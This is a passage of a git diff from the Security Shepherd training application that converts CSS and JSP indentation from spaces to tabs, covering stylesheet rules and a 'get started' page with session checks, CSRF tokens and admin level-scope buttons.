+	border-bottom: 1px dotted #FFFFFF;
+	padding-left: 15px;
 }
 
 #sidebar h2 {
-    margin: 0;
-    padding: 10px 0 0 40px;
-    height: 40px;
+	margin: 0;
+	padding: 10px 0 0 40px;
+	height: 40px;
 }
 
 #sidebar a {
-    text-decoration: none;
+	text-decoration: none;
 }
 
 #sidebar a:hover {
-
+	
 }
 
 #searchResults {
-    width: 100%;
+	width: 100%;
 }
 
 #searchResults li {
-    cursor: pointer;
-    cursor: hand;
-    border-bottom: 1px solid #d4d4d4;
-    padding-left: 5px;
-    padding-right: 5px;
-    width: 90%;
+	cursor: pointer;
+	cursor: hand;
+	border-bottom: 1px solid #d4d4d4;
+	padding-left: 5px;
+	padding-right: 5px;
+	width: 90%;
 }
 
 /* Footer */
 #footer {
-    clear: both;
-    width: 760px;
-    height: 40px;
-    margin: 0 auto;
-    padding: 20px 0 0 0;
-    background: url(images/footer1.gif) no-repeat left top;
-    text-align: center;
-    font-size: smaller;
-    color: #FFFFFF;
+	clear: both;
+	width: 760px;
+	height: 40px;
+	margin: 0 auto;
+	padding: 20px 0 0 0;
+	background: url(images/footer1.gif) no-repeat left top;
+	text-align: center;
+	font-size: smaller;
+	color: #FFFFFF;
 }
 
 #footer a {
-    color: #FFFFFF;
+	color: #FFFFFF;
 }
 
 .menuIcon {
-    position: relative;
-    padding-left: 0.05em;
-    font-size: 3em;
-    display: none;
-    padding-top: 5px;
+	position: relative;
+	padding-left: 0.05em;
+	font-size: 3em;
+	display: none;
+	padding-top: 5px;
 }
 
 .menuButton {
-    display: block;
-    border-bottom: 3px solid #A878EF;
-    background: #D4D4D4;
-    padding: 5px 5px;
-    border-radius: 5px;
-    color: black;
-    font-size: 1.5em;
-    text-align: center;
-    text-decoration: none;
-    vertical-align: middle;
-    margin-bottom: 5px;
+	display: block;
+	border-bottom: 3px solid #A878EF;
+	background: #D4D4D4;
+	padding: 5px 5px;
+	border-radius: 5px;
+	color: black;
+	font-size: 1.5em;
+	text-align: center;
+	text-decoration: none;
+	vertical-align: middle;
+	margin-bottom: 5px;
 }
 
 .menuButton:hover {
-    border-top-color: #CC99FF;
-    background: #BFBFBF;
+	border-top-color: #CC99FF;
+	background: #BFBFBF;
 }
 
 .menuButton:active {
-    border-top-color: #8660BF;
-    background: #8660BF;
+	border-top-color: #8660BF;
+	background: #8660BF;
 }
 
 .scoreBar {
-    background-color: #965BED;
-    height: 30px;
-    position: relative;
-    font-size: 25px;
-    font-weight: bold;
-    padding-left: 5;
-    vertical-align: middle;
-    padding-top: 5;
-    border: white;
-    margin: 0 0 3px 0;
-    min-width: 240px;
-    color: white;
+	background-color: #965BED;
+	height: 30px;
+	position: relative;
+	font-size: 25px;
+	font-weight: bold;
+	padding-left: 5;
+	vertical-align: middle;
+	padding-top: 5;
+	border: white;
+	margin: 0 0 3px 0;
+	min-width: 240px;
+	color: white;
 }
 
 .scoreBar:hover {
-    background-color: #AC7DF2;
-    height: 30px;
-    position: relative;
-    font-size: 25px;
-    font-weight: bold;
-    padding-left: 5;
-    vertical-align: middle;
-    padding-top: 5;
-    border: white;
-    margin: 0 0 3px 0;
-    min-width: 240px;
-    color: white;
+	background-color: #AC7DF2;
+	height: 30px;
+	position: relative;
+	font-size: 25px;
+	font-weight: bold;
+	padding-left: 5;
+	vertical-align: middle;
+	padding-top: 5;
+	border: white;
+	margin: 0 0 3px 0;
+	min-width: 240px;
+	color: white;
 }
 
 .scoreLine {
-    display: inline;
-    min-width: 100%;
+	display: inline;
+	min-width: 100%;
 }
 
 .leaderboard {
-    min-width: 100%;
+	min-width: 100%;
 }
 
 .scoreName {
-    white-space: nowrap;
-    overflow: hidden;
-    text-overflow: ellipsis;
-    display: inline;
-    position: absolute;
-    left: 80px;
-    width: 50%
+	white-space: nowrap;
+	overflow: hidden;
+	text-overflow: ellipsis;
+	display: inline;
+	position: absolute;
+	left: 80px;
+	width: 50%
 }
 
 .place {
-    display: inline;
-    color: #000000;
-    min-width: 25px;
+	display: inline;
+	color: #000000;
+	min-width: 25px;
 }
 
 .scoreNumber {
-    display: inline;
-    float: right;
-    padding-right: 5px;
-    padding-top: 2px;
-    color: white;
+	display: inline;
+	float: right;
+	padding-right: 5px;
+	padding-top: 2px;
+	color: white;
 }
 
 .medalContainer {
-    display: inline;
+	display: inline;
 }
 
 .goldMedalAmountBubble {
-    width: 20px;
-    height: 20px;
-    box-shadow: 1px 1px 1px gray;
-    background-color: gold;
-    color: black;
-    font-weight: bold;
-    font-size: 14px;
-    border-radius: 50%;
-    text-align: center;
-    display: inline-block;
-    margin-left: 5px;
-    line-height: 23px;
+	width: 20px;
+	height: 20px;
+	box-shadow: 1px 1px 1px gray;
+	background-color: gold;
+	color: black;
+	font-weight: bold;
+	font-size: 14px;
+	border-radius: 50%;
+	text-align: center;
+	display: inline-block;
+	margin-left: 5px;
+	line-height: 23px;
 }
 
 .silverMedalAmountBubble {
-    width: 20px;
-    height: 20px;
-    box-shadow: 1px 1px 1px gray;
-    background-color: silver;
-    color: black;
-    font-weight: bold;
-    font-size: 14px;
-    border-radius: 50%;
-    text-align: center;
-    display: inline-block;
-    margin-left: 5px;
-    line-height: 23px;
+	width: 20px;
+	height: 20px;
+	box-shadow: 1px 1px 1px gray;
+	background-color: silver;
+	color: black;
+	font-weight: bold;
+	font-size: 14px;
+	border-radius: 50%;
+	text-align: center;
+	display: inline-block;
+	margin-left: 5px;
+	line-height: 23px;
 }
 
 .bronzeMedalAmountBubble {
-    width: 20px;
-    height: 20px;
-    box-shadow: 1px 1px 1px gray;
-    background-color: #CD7F32;
-    color: black;
-    font-weight: bold;
-    font-size: 14px;
-    border-radius: 50%;
-    text-align: center;
-    display: inline-block;
-    margin-left: 5px;
-    line-height: 23px;
+	width: 20px;
+	height: 20px;
+	box-shadow: 1px 1px 1px gray;
+	background-color: #CD7F32;
+	color: black;
+	font-weight: bold;
+	font-size: 14px;
+	border-radius: 50%;
+	text-align: center;
+	display: inline-block;
+	margin-left: 5px;
+	line-height: 23px;
 }
 
 .informationBox {
-    display: block;
-    margin 0;
-    border-color: #A878EF;
-    border-style: dashed;
-    background-color: #D4D4D4;
-    padding-top: 5px;
-    padding-bottom: 5px;
-    padding-right: 5px;
-    padding-left: 5px;
-    margin-bottom: 5px;
+	display: block; margin 0;
+	border-color: #A878EF;
+	border-style: dashed;
+	background-color: #D4D4D4;
+	padding-top: 5px;
+	padding-bottom: 5px;
+	padding-right: 5px;
+	padding-left: 5px;
+	margin-bottom: 5px;
 }
 
 .cheatBox {
-    float: right;
-    margin 0;
-    width: 685px;
-    border-color: #A878EF;
-    border-style: dashed;
-    background-color: #D4D4D4;
-    padding-top: 5px;
-    padding-bottom: 5px;
-    padding-right: 5px;
-    padding-left: 5px;
-    margin-bottom: 10px;
+	float: right; margin 0;
+	width: 685px;
+	border-color: #A878EF;
+	border-style: dashed;
+	background-color: #D4D4D4;
+	padding-top: 5px;
+	padding-bottom: 5px;
+	padding-right: 5px;
+	padding-left: 5px;
+	margin-bottom: 10px;
 }
 
 .moduleSearchBox {
-    height: 26px;
-    width: 100%;
-    padding: 0 12px 0 25px;
-    background: white url("images/searchIcon.png") 8px 6px no-repeat;
-    border-width: 1px;
-    border-style: solid;
-    border-color: #BFBFBF #BFBFBF #BFBFBF;
-    border-radius: 13px;
-    margin-top: 2px;
-    -webkit-box-sizing: border-box;
-    -moz-box-sizing: border-box;
-    -ms-box-sizing: border-box;
-    -o-box-sizing: border-box;
-    box-sizing: border-box;
-    -webkit-box-shadow: inset 0 1px #e5e7ed, 0 1px 0 #fcfcfc;
-    -moz-box-shadow: inset 0 1px #e5e7ed, 0 1px 0 #fcfcfc;
-    -ms-box-shadow: inset 0 1px #e5e7ed, 0 1px 0 #fcfcfc;
-    -o-box-shadow: inset 0 1px #e5e7ed, 0 1px 0 #fcfcfc;
-    box-shadow: inset 0 1px #e5e7ed, 0 1px 0 #fcfcfc;
+	height: 26px;
+	width: 100%;
+	padding: 0 12px 0 25px;
+	background: white url("images/searchIcon.png") 8px 6px no-repeat;
+	border-width: 1px;
+	border-style: solid;
+	border-color: #BFBFBF #BFBFBF #BFBFBF;
+	border-radius: 13px;
+	margin-top: 2px;
+	-webkit-box-sizing: border-box;
+	-moz-box-sizing: border-box;
+	-ms-box-sizing: border-box;
+	-o-box-sizing: border-box;
+	box-sizing: border-box;
+	-webkit-box-shadow: inset 0 1px #e5e7ed, 0 1px 0 #fcfcfc;
+	-moz-box-shadow: inset 0 1px #e5e7ed, 0 1px 0 #fcfcfc;
+	-ms-box-shadow: inset 0 1px #e5e7ed, 0 1px 0 #fcfcfc;
+	-o-box-shadow: inset 0 1px #e5e7ed, 0 1px 0 #fcfcfc;
+	box-shadow: inset 0 1px #e5e7ed, 0 1px 0 #fcfcfc;
 }
 
 .resultbox {
-    width: 620px;
+	width: 620px;
 }
 
 #submitResult {
-    display: none;
-    float: right;
+	display: none;
+	float: right;
 }
 
 .levelIframe {
-    word-wrap: break-word;
-    width: 100%;
-    height: 2056px;
+	word-wrap: break-word;
+	width: 100%;
+	height: 2056px;
 }
 
 .levelList {
-    max-height: 230px;
+	max-height: 230px;
 }
 
 .tooltipped {
-    position: relative;
+	position: relative;
 }
 
 .tooltipped::before {
-    position: absolute;
-    z-index: 1000001;
-    display: none;
-    width: 0;
-    height: 0;
-    color: rgba(0, 0, 0, 0.8);
-    pointer-events: none;
-    content: "";
-    border: 5px solid;
+	position: absolute;
+	z-index: 1000001;
+	display: none;
+	width: 0;
+	height: 0;
+	color: rgba(0, 0, 0, 0.8);
+	pointer-events: none;
+	content: "";
+	border: 5px solid;
 }
 
 .tooltipped::after {
-    background: rgba(212, 212, 212, 0.8);
-    border: 2px solid rgba(168, 120, 239, 0.8);
-    border-radius: 3px;
-    content: attr(aria-label);
-    display: inline-block;
-    font: normal normal 11px/1.5 Helvetica, arial, nimbussansl,
-    liberationsans, freesans, clean, sans-serif ";
-    letter-spacing: 0.5px;
-    padding: 5px 8px;
-    pointer-events: none;
-    position: absolute;
-    text-align: center;
-    text-decoration: none;
-    text-shadow: none;
-    text-transform: none;
-    white-space: pre;
-    word-wrap: break-word;
-    z-index: 1000000;
-    -webkit-font-smoothing: subpixel-antialiased;
+	background: rgba(212, 212, 212, 0.8);
+	border: 2px solid rgba(168, 120, 239, 0.8);
+	border-radius: 3px;
+	content: attr(aria-label);
+	display: inline-block;
+	font: normal normal 11px/1.5 Helvetica, arial, nimbussansl,
+		liberationsans, freesans, clean, sans-serif";
+	letter-spacing: 0.5px;
+	padding: 5px 8px;
+	pointer-events: none;
+	position: absolute;
+	text-align: center;
+	text-decoration: none;
+	text-shadow: none;
+	text-transform: none;
+	white-space: pre;
+	word-wrap: break-word;
+	z-index: 1000000;
+	-webkit-font-smoothing: subpixel-antialiased;
 }
 
 .setupPage {
-    width: 80%;
-    display: block;
-    margin-left: auto;
-    margin-right: auto;
+	width: 80%;
+	display: block;
+	margin-left: auto;
+	margin-right: auto;
 }
 
 .setupPage input[type=text], .setupPage input[type=password], .setupPage select,
-div .setupPage textarea {
-    width: 100%;
-    padding: 12px;
-    border: 1px solid #ccc;
-    border-radius: 4px;
-    box-sizing: border-box;
-    resize: vertical;
+	div .setupPage textarea {
+	width: 100%;
+	padding: 12px;
+	border: 1px solid #ccc;
+	border-radius: 4px;
+	box-sizing: border-box;
+	resize: vertical;
 }
 
 .setupPage label {
-    padding: 12px 12px 12px 0;
-    display: inline-block;
+	padding: 12px 12px 12px 0;
+	display: inline-block;
 }
 
 .setupPage input[type=submit] {
-    background-color: #4CAF50;
-    color: white;
-    padding: 12px 20px;
-    border: none;
-    border-radius: 4px;
-    cursor: pointer;
-    display: block;
-    margin-left: auto;
-    margin-right: auto;
-    margin-top: 10px;
+	background-color: #4CAF50;
+	color: white;
+	padding: 12px 20px;
+	border: none;
+	border-radius: 4px;
+	cursor: pointer;
+	display: block;
+	margin-left: auto;
+	margin-right: auto;
+	margin-top: 10px;
 }
 
 .setupPage .container {
-    border-radius: 5px;
-    background-color: #f2f2f2;
-    padding: 20px;
+	border-radius: 5px;
+	background-color: #f2f2f2;
+	padding: 20px;
 }
 
 .setupPage .col-25 {
-    float: left;
-    width: 25%;
-    margin-top: 6px;
+	float: left;
+	width: 25%;
+	margin-top: 6px;
 }
 
 .setupPage .col-75 {
-    float: left;
-    width: 75%;
-    margin-top: 6px;
+	float: left;
+	width: 75%;
+	margin-top: 6px;
 }
 
 .setupPage .row:after {
-    content: "";
-    display: table;
-    clear: both;
+	content: "";
+	display: table;
+	clear: both;
 }
 
 @media screen and (max-width: 600px) {
-    .setupPage .col-25, .setupPage .col-75, .setupPage [type=submit] {
-        width: 100%;
-        margin-top: 0;
-    }
+	.setupPage .col-25, .setupPage .col-75, .setupPage  [type=submit] {
+		width: 100%;
+		margin-top: 0;
+	}
 }
\ No newline at end of file
diff --git a/src/main/webapp/css/theResponsiveCss.css b/src/main/webapp/css/theResponsiveCss.css
index 2eefbdc5f..06c0655b3 100644
--- a/src/main/webapp/css/theResponsiveCss.css
+++ b/src/main/webapp/css/theResponsiveCss.css
@@ -1,107 +1,90 @@
 @media screen and (max-width: 1020px) {
-    #page {
-        width: 100%;
-    }
-
-    #sidebar {
-        display: none;
-        width: 100%;
-    }
-
-    #contentDiv {
-        width: 85%;
-        margin-right: 5%;
-    }
-
-    .sidebarWrapper {
-        width: 40px;
-        background: #D4D4D4;
-        border-top: 3px solid #A878EF;
-        border-right: 3px solid #A878EF;
-        position: absolute;
-        height: 150%;
-        border-radius: 2px;
-        text-decoration: none;
-        vertical-align: top;
-    }
-
-    .sidebarWrapper:hover {
-        width: 200px;
-        background: #AEACAC;
-        border-top: 3px solid #A878EF;
-        border-right: 3px solid #A878EF;
-        position: absolute;
-        border-radius: 2px;
-        text-decoration: none;
-        vertical-align: top;
-        padding-left: 10px;
-        padding-right: 10px;
-        padding-top: 10px;
-    }
-
-    .sidebarWrapper:hover #sidebar {
-        display: block;
-    }
-
-    .sidebarWrapper:hover .menuIcon {
-        display: none;
-    }
-
-    .sidebarWrapperAlwaysOpen {
-        width: 200px;
-        background: #AEACAC;
-        border-top: 3px solid #A878EF;
-        border-right: 3px solid #A878EF;
-        position: absolute;
-        height: 100%;
-        border-radius: 2px;
-        text-decoration: none;
-        vertical-align: top;
-        padding-left: 10px;
-        padding-right: 10px;
-        padding-top: 10px;
-    }
-
-    .sidebarWrapperAlwaysOpen #sidebar {
-        display: block;
-    }
-
-    .sidebarWrapperAlwaysOpen .menuIcon {
-        display: none;
-    }
-
-    .menuIcon {
-        display: block;
-    }
-
-    .menuIcon:before {
-        display: block;
-    }
-
-    #submitResult {
-        margin-left: 10%;
-        float: left;
-        width: 90%;
-    }
-
-    .resultTable {
-        width: 100%
-    }
-
-    .resultBoxCell {
-        width: 85%
-    }
-
-    .submitResultCell {
-        width: 15%
-    }
-
-    .resultbox {
-        width: 100%;
-    }
-
-    .cheatBox {
-        float: left;
-        width: 90%;
-    }
+	#page {
+		width: 100%;
+	}
+	#sidebar {
+		display: none;
+		width: 100%;
+	}
+	#contentDiv {
+		width: 85%;
+		margin-right: 5%;
+	}
+	.sidebarWrapper {
+		width: 40px;
+		background: #D4D4D4;
+		border-top: 3px solid #A878EF;
+		border-right: 3px solid #A878EF;
+		position: absolute;
+		height: 150%;
+		border-radius: 2px;
+		text-decoration: none;
+		vertical-align: top;
+	}
+	.sidebarWrapper:hover {
+		width: 200px;
+		background: #AEACAC;
+		border-top: 3px solid #A878EF;
+		border-right: 3px solid #A878EF;
+		position: absolute;
+		border-radius: 2px;
+		text-decoration: none;
+		vertical-align: top;
+		padding-left: 10px;
+		padding-right: 10px;
+		padding-top: 10px;
+	}
+	.sidebarWrapper:hover  #sidebar {
+		display: block;
+	}
+	.sidebarWrapper:hover .menuIcon {
+		display: none;
+	}
+	.sidebarWrapperAlwaysOpen {
+		width: 200px;
+		background: #AEACAC;
+		border-top: 3px solid #A878EF;
+		border-right: 3px solid #A878EF;
+		position: absolute;
+		height: 100%;
+		border-radius: 2px;
+		text-decoration: none;
+		vertical-align: top;
+		padding-left: 10px;
+		padding-right: 10px;
+		padding-top: 10px;
+	}
+	.sidebarWrapperAlwaysOpen  #sidebar {
+		display: block;
+	}
+	.sidebarWrapperAlwaysOpen .menuIcon {
+		display: none;
+	}
+	.menuIcon {
+		display: block;
+	}
+	.menuIcon:before {
+		display: block;
+	}
+	#submitResult {
+		margin-left: 10%;
+		float: left;
+		width: 90%;
+	}
+	.resultTable {
+		width: 100%
+	}
+	.resultBoxCell {
+		width: 85%
+	}
+	.submitResultCell {
+		width: 15%
+	}
+	.resultbox {
+		width: 100%;
+	}
+	.cheatBox {
+		float: left;
+		width: 90%;
+	}
 }
\ No newline at end of file
diff --git a/src/main/webapp/getStarted.jsp b/src/main/webapp/getStarted.jsp
index b0fdedc07..579f4fb6d 100644
--- a/src/main/webapp/getStarted.jsp
+++ b/src/main/webapp/getStarted.jsp
@@ -1,339 +1,364 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ include file="translation.jsp" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ include file="translation.jsp"%>
 <%
-    /**
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        Getter get = new Getter();
+/**
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ * 
+ * @author Mark Denihan
+ */
+ 
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
 //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(getStarted.jsp): tokenCookie Error:" + htmlE.toString());
-        }
+Cookie tokenCookie = null;
+try
+{
+	tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(getStarted.jsp): tokenCookie Error:" + htmlE.toString());
+}
 // validateSession ensures a valid session, and valid role credentials
 // Also, if tokenCookie != null, then the page is good to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            //Logging Username
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+if (Validate.validateSession(ses) && tokenCookie != null)
+{
+	//Logging Username
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 // Getting Session Variables
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-            String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
-            String userName = Encode.forHtml(ses.getAttribute("userName").toString());
-            String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
-            boolean isAdmin = userRole.equalsIgnoreCase("admin");
-            boolean changePassword = false;
-            boolean changeUsername = false;
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String userName = Encode.forHtml(ses.getAttribute("userName").toString());
+String userRole = Encode.forHtml(ses.getAttribute("userRole").toString());
+String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+boolean isAdmin = userRole.equalsIgnoreCase("admin");
+boolean changePassword = false;
+boolean changeUsername = false;
 
-            if (ses.getAttribute("ChangePassword") != null) {
-                String tempPass = ses.getAttribute("ChangePassword").toString();
-                changePassword = tempPass.equalsIgnoreCase("true");
-            }
-            if (ses.getAttribute("ChangeUsername") != null) {
-                String tempUsername = ses.getAttribute("ChangeUsername").toString();
-                changeUsername = tempUsername.equalsIgnoreCase("true");
-            }
+if(ses.getAttribute("ChangePassword") != null)
+{
+	String tempPass = ses.getAttribute("ChangePassword").toString();
+	changePassword = tempPass.equalsIgnoreCase("true");
+}
+if(ses.getAttribute("ChangeUsername") != null)
+{
+	String tempUsername = ses.getAttribute("ChangeUsername").toString();
+	changeUsername = tempUsername.equalsIgnoreCase("true");
+}
 
-            if (changeUsername && changePassword) {
-                // These should never be true at the same time
-                throw new RuntimeException("Can't both change username and password!");
-            }
+if (changeUsername && changePassword)
+{
+	// These should never be true at the same time
+	throw new RuntimeException("Can't both change username and password!");
+}
 
-            int i = 0;
+int i = 0;
 
-            if (changePassword) {
-                //If password is temporary, ask user to change
+if(changePassword)
+{
+	//If password is temporary, ask user to change
 
-%>
+	%>
 <div class="errorWrapper">
-    <fmt:message key="getStarted.text.info.changePassword"/>
-    <br/>
-    <br/>
-    <div class="errorMessage">
-        <form id="changePassword" method="POST" action="passwordChange">
-            <table align="center">
-                <tr>
-                    <td>Current Password:</td>
-                    <td><input type="password" name="currentPassword"/></td>
-                </tr>
-                <tr>
-                    <td>New Password:</td>
-                    <td><input type="password" name="newPassword"/></td>
-                </tr>
-                <tr>
-                    <td>Password Confirmation:</td>
-                    <td><input type="password" name="passwordConfirmation"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2" style="align-content: center"><input
-                            type="submit" id="changePasswordSubmit" value="Change Password"/></td>
-                </tr>
-            </table>
-            <input type="hidden" name="csrfToken" value="<%=csrfToken%>"/>
-        </form>
-    </div>
+	<fmt:message key="getStarted.text.info.changePassword" />
+	<br />
+	<br />
+	<div class="errorMessage">
+		<form id="changePassword" method="POST" action="passwordChange">
+			<table align="center">
+				<tr>
+					<td>Current Password:</td>
+					<td><input type="password" name="currentPassword" /></td>
+				</tr>
+				<tr>
+					<td>New Password:</td>
+					<td><input type="password" name="newPassword" /></td>
+				</tr>
+				<tr>
+					<td>Password Confirmation:</td>
+					<td><input type="password" name="passwordConfirmation" /></td>
+				</tr>
+				<tr>
+					<td colspan="2" style="align-content: center"><input
+						type="submit" id="changePasswordSubmit" value="Change Password" /></td>
+				</tr>
+			</table>
+			<input type="hidden" name="csrfToken" value="<%=csrfToken%>" />
+		</form>
+	</div>
 </div>
 <%
-} else if (changeUsername) {
-    // If username is temporary, allow user to change (but not compulsory)
-%>
+}
+else if(changeUsername)
+{
+	// If username is temporary, allow user to change (but not compulsory)
+	%>
 <div class="errorWrapper">
-    <fmt:message key="getStarted.text.info.changeUsername"/>
-    <br/>
-    <br/>
-    <div class="errorMessage">
-        <form id="changeUsername" method="POST" action="usernameChange">
-            <table align="center">
-                <tr>
-                    <td>New username:</td>
-                    <td><input type="text" name="newUsername"
-                               value="<%= userName %>"/></td>
-                </tr>
-                <tr>
-                    <td colspan="2" style="align-content: center"><input
-                            type="submit" id="changeUsernameSubmit" value="Change Username"/></td>
-                </tr>
-            </table>
-            <input type="hidden" name="csrfToken" value="<%=csrfToken%>"/>
-        </form>
-    </div>
+	<fmt:message key="getStarted.text.info.changeUsername" />
+	<br />
+	<br />
+	<div class="errorMessage">
+		<form id="changeUsername" method="POST" action="usernameChange">
+			<table align="center">
+				<tr>
+					<td>New username:</td>
+					<td><input type="text" name="newUsername"
+						value="<%= userName %>" /></td>
+				</tr>
+				<tr>
+					<td colspan="2" style="align-content: center"><input
+						type="submit" id="changeUsernameSubmit" value="Change Username" /></td>
+				</tr>
+			</table>
+			<input type="hidden" name="csrfToken" value="<%=csrfToken%>" />
+		</form>
+	</div>
 </div>
 <%
-} else {
-%>
+}
+else
+{
+	%>
 <div id="getStarted" style="display: none;">
-    <div class="post">
-        <h1 class="title">
-            <fmt:message key="getStarted.text.lets_start"/>
-        </h1>
-        <div class="entry">
-            <p>
-                <% if (ModulePlan.isOpenFloor()) { %>
-                <fmt:message key="getStarted.text.moduleInfo.openFloor"/>
-                <% } else if (ModulePlan.isIncrementalFloor()) { %>
-                <fmt:message key="getStarted.text.moduleInfo.incrementalFloor"/>
-                <% } else {%>
-                <fmt:message key="getStarted.text.moduleInfo"/>
-                <% } %>
-            </p>
-            <% if (isAdmin) {%>
-            <h2 class="title">
-                <fmt:message key="generic.text.configureShepherd"/>
-            </h2>
-            <p>
-                <fmt:message key="getStarted.text.configureShepherd.asAnAdmin"/>
-                <br/>
-            <div id="scopeResultsDiv" class="informationBox"
-                 style="display: none;"></div>
-            <br/>
-            <div id="setScopeDiv">
-                <a href="javascript:;" style="text-decoration: none;"
-                   id="allApplication">
-                    <div class="menuButton">
-                        <fmt:message key="getStarted.button.openLevels.all"/>
-                    </div>
-                </a> <a href="javascript:;" style="text-decoration: none;"
-                        id="onlyWebApplication">
-                <div class="menuButton">
-                    <fmt:message key="getStarted.button.openLevels.web"/>
-                </div>
-            </a> <a href="javascript:;" style="text-decoration: none;"
-                    id="onlyMobileApplication">
-                <div class="menuButton">
-                    <fmt:message key="getStarted.button.openLevels.mobile"/>
-                </div>
-            </a> <a href="javascript:;" style="text-decoration: none;"
-                    id="noApplication">
-                <div class="menuButton">
-                    <fmt:message key="getStarted.button.closeLevels"/>
-                </div>
-            </a> <input type="checkbox" id="unsafeLevels" name="unsafeLevels"
-                        value="enable"> <label for="unsafeLevels"><fmt:message
-                    key="getStarted.button.enable.unsafe"/></label> <br/>
-                <span><a><fmt:message key="getStarted.enable.unsafe.info"/></a></span>
+	<div class="post">
+		<h1 class="title">
+			<fmt:message key="getStarted.text.lets_start" />
+		</h1>
+		<div class="entry">
+			<p>
+				<% if(ModulePlan.isOpenFloor()) { %>
+				<fmt:message key="getStarted.text.moduleInfo.openFloor" />
+				<% } else if (ModulePlan.isIncrementalFloor()) { %>
+				<fmt:message key="getStarted.text.moduleInfo.incrementalFloor" />
+				<% } else {%>
+				<fmt:message key="getStarted.text.moduleInfo" />
+				<% } %>
+			</p>
+			<% if(isAdmin) {%>
+			<h2 class="title">
+				<fmt:message key="generic.text.configureShepherd" />
+			</h2>
+			<p>
+				<fmt:message key="getStarted.text.configureShepherd.asAnAdmin" />
+				<br />
+			<div id="scopeResultsDiv" class="informationBox"
+				style="display: none;"></div>
+			<br />
+			<div id="setScopeDiv">
+				<a href="javascript:;" style="text-decoration: none;"
+					id="allApplication"><div class="menuButton">
+						<fmt:message key="getStarted.button.openLevels.all" />
+					</div></a> <a href="javascript:;" style="text-decoration: none;"
+					id="onlyWebApplication"><div class="menuButton">
+						<fmt:message key="getStarted.button.openLevels.web" />
+					</div></a> <a href="javascript:;" style="text-decoration: none;"
+					id="onlyMobileApplication"><div class="menuButton">
+						<fmt:message key="getStarted.button.openLevels.mobile" />
+					</div></a> <a href="javascript:;" style="text-decoration: none;"
+					id="noApplication"><div class="menuButton">
+						<fmt:message key="getStarted.button.closeLevels" />
+					</div></a> <input type="checkbox" id="unsafeLevels" name="unsafeLevels"
+					value="enable"> <label for="unsafeLevels"><fmt:message
+						key="getStarted.button.enable.unsafe" /></label> <br />
+				<span><a><fmt:message key="getStarted.enable.unsafe.info" /></a></span>
 
-            </div>
-            <div id="scopeLoadingDiv" style="display: none;">
-                <fmt:message key="generic.text.loading"/>
-            </div>
+			</div>
+			<div id="scopeLoadingDiv" style="display: none;">
+				<fmt:message key="generic.text.loading" />
+			</div>
 
-            <% } %>
-            <br/> <br/> <a><fmt:message
-                key="getStarted.text.checkShepConfigMsg"/></a>.
-        </div>
-        <br/>
-        <div id="cantSee"></div>
-    </div>
+			<% } %>
+			<br /> <br /> <a><fmt:message
+					key="getStarted.text.checkShepConfigMsg" /></a>.
+		</div>
+		<br />
+		<div id="cantSee"></div>
+	</div>
 </div>
 <script>
-    var theCsrfToken = "<%= csrfToken %>";
-    var theRefreshError = "Could not Refresh Menu";
+	var theCsrfToken = "<%= csrfToken %>";
+	var theRefreshError = "Could not Refresh Menu";
 
-    $('#getStarted').slideDown("slow");
-    $('#cantSee').html("<iframe class='levelIframe' frameborder='no' id='theStart' src='readyToPlay.jsp'></iframe>");
-    $('#cantSee').html(function () {
-        $("#theStart").load(function () {
-            $("#contentDiv").slideDown("slow");
-        });
-    });
-    <% if (isAdmin) { %>
-    $("#allApplication").click(function () {
-        if ($('#unsafeLevels').is(":checked")) {
+	$('#getStarted').slideDown("slow");
+	$('#cantSee').html("<iframe class='levelIframe' frameborder='no' id='theStart' src='readyToPlay.jsp'></iframe>");
+	$('#cantSee').html(function(){
+		$("#theStart").load(function(){
